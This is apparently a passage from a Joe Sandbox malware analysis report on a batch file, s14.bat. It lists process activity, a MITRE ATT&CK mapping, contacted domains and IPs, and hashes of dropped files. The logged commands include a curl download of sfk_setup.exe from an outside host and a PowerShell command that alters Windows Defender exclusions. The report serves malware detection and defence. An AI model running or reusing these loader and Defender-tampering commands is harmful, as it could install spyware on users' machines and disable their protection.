Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 10Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid AccountsWindows Management Instrumentation1
Scripting		11
Process Injection		1
Disable or Modify Tools		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		1
DLL Side-Loading		1
Modify Registry		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)21
Virtualization/Sandbox Evasion		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets11
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
s14.bat5%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
cdnbaynet.com1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdnbaynet.com/loader/link.php?prg_id=sfk1%VirustotalBrowse
https://cdnbaynet.com/loader/link.php?prg_id=sfkcurl.exe1%VirustotalBrowse
https://cdnbaynet.com/loader/link.php?prg_id=sfkWinsta01%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
cdnbaynet.com
167.114.14.170
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://cdnbaynet.com/loader/link.php?prg_id=sfkfalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://cdnbaynet.com/loader/link.php?prg_id=sfkkjcurl.exe, 0000000D.00000002.1425120515.000001C1E4530000.00000004.00000020.00020000.00000000.sdmpfalse
    		unknown
    https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeWinsta0curl.exe, 0000000E.00000002.1425917834.000001C9F6150000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1526338394.000001E7C1B90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1627992980.000001D1823D0000.00000004.00000020.00020000.00000000.sdmpfalse
      		unknown
      https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe6Mcurl.exe, 00000011.00000002.1526338394.000001E7C1B90000.00000004.00000020.00020000.00000000.sdmpfalse
        		unknown
        https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:curl.exe, 00000013.00000002.1628051671.000001D182570000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1627992980.000001D1823D0000.00000004.00000020.00020000.00000000.sdmpfalse
          		unknown
          https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exetMcurl.exe, 00000011.00000002.1526338394.000001E7C1B90000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
            https://swtb-download.spyrix-sfk.cotimeout.exe, 0000000F.00000002.1525812168.000001B142E49000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 00000012.00000002.1627509145.00000233D6278000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeicurl.exe, 0000000E.00000002.1425917834.000001C9F6159000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://cdnbaynet.com/loader/link.php?prg_id=sfkcurl.execurl.exe, 0000000D.00000002.1425120515.000001C1E4530000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                https://cdnbaynet.com/loader/link.php?prg_id=sfkhmicurl.exe, 0000000D.00000002.1425120515.000001C1E4538000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://cdnbaynet.com/loader/link.php?prg_id=sfk9jcurl.exe, 0000000D.00000002.1425120515.000001C1E4530000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe, 00000013.00000002.1627992980.000001D1823D0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1627992980.000001D1823D9000.00000004.00000020.00020000.00000000.sdmp, l.13.drfalse
                      		unknown
                      https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exedMcurl.exe, 00000011.00000002.1526338394.000001E7C1B90000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.execurl.exe, 0000000E.00000002.1425917834.000001C9F6150000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1526338394.000001E7C1B90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1627992980.000001D1823D0000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://cdnbaynet.com/loader/link.php?prg_id=sfkWinsta0curl.exe, 0000000D.00000002.1425120515.000001C1E4530000.00000004.00000020.00020000.00000000.sdmpfalseunknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          167.114.14.170
                          		cdnbaynet.comCanada
                          		16276OVHFRfalse

                          Private

                          IP
                          127.0.0.1

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1523868
                          Start date and time:2024-10-02 06:10:09 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 37s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:24
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:s14.bat
                          Detection:MAL
                          Classification:mal60.evad.winBAT@20/17@1/2
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .bat

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtCreateKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          00:11:10API Interceptor51x Sleep call for process: powershell.exe modified

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          OVHFR2Efe8RQhvR.vbsGet hashmaliciousPureLog StealerBrowse
                          • 91.134.98.142
                          http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630Get hashmaliciousUnknownBrowse
                          • 51.195.5.58
                          https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                          • 51.68.39.188
                          OXrZ6fj4Hq.exeGet hashmaliciousNeshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWormBrowse
                          • 51.255.119.242
                          moba-24.2-installer_M64ZB-1.exeGet hashmaliciousPureLog StealerBrowse
                          • 178.32.197.57
                          https://booking.com-partners.one/confirm/login/qAlElVVFGet hashmaliciousUnknownBrowse
                          • 94.23.17.185
                          https://wtm.ventes-privees-du-jour.com/r/eNplj92OmzAQRp+GvQwYbGNfRBVNwgblh61I0jQ3kTEmOAXsgoFNnr6utFppVcnSSOd845mZXApCiJCbs5xhHwkaMq/EwEMCc1wCRjGl3MOeC0iAXArdEmJaepgUhBKOwoJCQIUgBJU+CwoB3NCFrnK/DfPKGN07QeT4sX3TNM0q1TRCd3IUM64aC2Xb805qI1XrBLENL33iewR4nu/4eDDNtVdDx4UVk6htjxh1cf9QjSjk0FjFdf2BOGs0k7f2v7xomKwt7VQuOuNAz4hatMLMcmEtH3pjs921lF1vWtb8Gxi1rfwia/bpfibb7WqXWVvr66gtcfzgmiyvtrwUfJ4+1qCs1GnU/YrCyR4TK60aFU3idQ8ntNjW9+hZoTo/m7dl4PjfT7UZq27RguCy3hwOoZ/CanOkZnFKm8Oe4SnLJU5uXnywf50j/fb0ft/+8Et0eC2nJEu3krdIqEyy22bEjzBN90n9rLTMyO7Ml8kK3n+dH7dwWhNYgGP6owiHUdD7eRVnLOlHu8Lx/ZJ2uwc/BY8jgXGUDvsXJueAIgDJX8NYskg=Get hashmaliciousUnknownBrowse
                          • 149.202.238.105
                          Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                          • 51.89.9.254
                          AMG Cargo Logistic.docxGet hashmaliciousRemcosBrowse
                          • 91.134.96.177
                          factura proforma .docx.docGet hashmaliciousRemcosBrowse
                          • 91.134.96.177

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          74954a0c86284d0d6e1c4efefe92b521KYwOaWhyl6.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                          • 167.114.14.170
                          HdXeCzyZD9.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                          • 167.114.14.170
                          NCTSgL4t0B.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                          • 167.114.14.170
                          TJWbSGBK0I.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                          • 167.114.14.170
                          4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                          • 167.114.14.170
                          UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                          • 167.114.14.170
                          4sTTCruY06.exeGet hashmaliciousHTMLPhisherBrowse
                          • 167.114.14.170
                          Cr4745ElZg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                          • 167.114.14.170
                          gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                          • 167.114.14.170
                          seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                          • 167.114.14.170

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):0.34726597513537405
                          Encrypted:false
                          SSDEEP:3:Nlll:Nll
                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                          Malicious:false
                          Preview:@...e...........................................................

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_021vghwn.wmz.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0lciiolt.coi.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0na20a1.czt.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrgqhyxv.f3a.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nb3rd5eu.sku.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ssxmx3vh.ues.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2yprijk.v3v.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
